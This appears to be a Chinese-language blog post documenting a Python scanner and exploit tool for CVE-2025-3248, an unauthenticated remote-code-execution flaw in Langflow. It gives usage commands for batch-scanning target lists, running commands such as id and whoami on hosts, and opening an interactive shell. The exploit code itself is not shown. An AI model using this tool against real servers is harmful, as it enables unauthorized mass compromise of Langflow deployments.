Langflow CVE-2025-3248漏洞利用工具详解

本文详细介绍CVE-2025-3248漏洞利用工具,该工具针对Langflow应用程序的关键功能缺失身份验证漏洞,支持远程代码执行扫描、批量目标检测和交互式shell操作。

CVE-2025-3248 Langflow RCE扫描器

一个用于扫描和利用CVE-2025-3248漏洞的Python工具,该漏洞允许在Langflow应用程序中实现远程代码执行(RCE)。

功能特性

  • 单目标扫描和命令执行
  • 批量URL扫描
  • 交互式shell模式
  • 多线程批量处理
  • 详细输出和错误处理
  • 结果保存到文件

安装依赖

1
pip install requests

使用方法

单目标扫描(进入交互式shell)

1
python cve-2025-3248.py http://target:port

单目标命令执行

1
python cve-2025-3248.py http://target:port -c "id"

批量扫描

1
python cve-2025-3248.py -f urls.txt

批量命令执行

1
python cve-2025-3248.py -f urls.txt -c "whoami"

高级选项

1
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v

参数说明

  • url: 目标URL (例如: http://10.10.10.1:7860)
  • -f, --file: 包含URL列表的文件,每行一个URL
  • -c, --cmd: 要执行的命令 (例如: id, whoami)
  • --timeout: 请求超时时间,默认10秒
  • -t, --threads: 批量扫描的线程数,默认10
  • -v, --verbose: 详细模式,显示原始响应

示例

示例1: 单目标扫描

1
python cve-2025-3248.py http://192.168.1.100:7860

示例2: 执行特定命令

1
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"

示例3: 批量扫描多个目标

创建文件 targets.txt:

1
2
3
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860

然后运行:

1
python cve-2025-3248.py -f targets.txt

示例4: 批量执行命令

1
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5

输出说明

  • [+] 成功执行
  • [-] 失败或错误
  • [!] 警告信息
  • [*] 信息输出

结果文件

成功扫描的目标会保存到 vulnerable_targets.txtvulnerable_targets_{command}.txt 文件中。

免责声明

此工具仅用于安全研究和教育目的。使用者应对其使用行为负责。未经授权对系统进行测试可能违反法律法规。

作者

参考

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计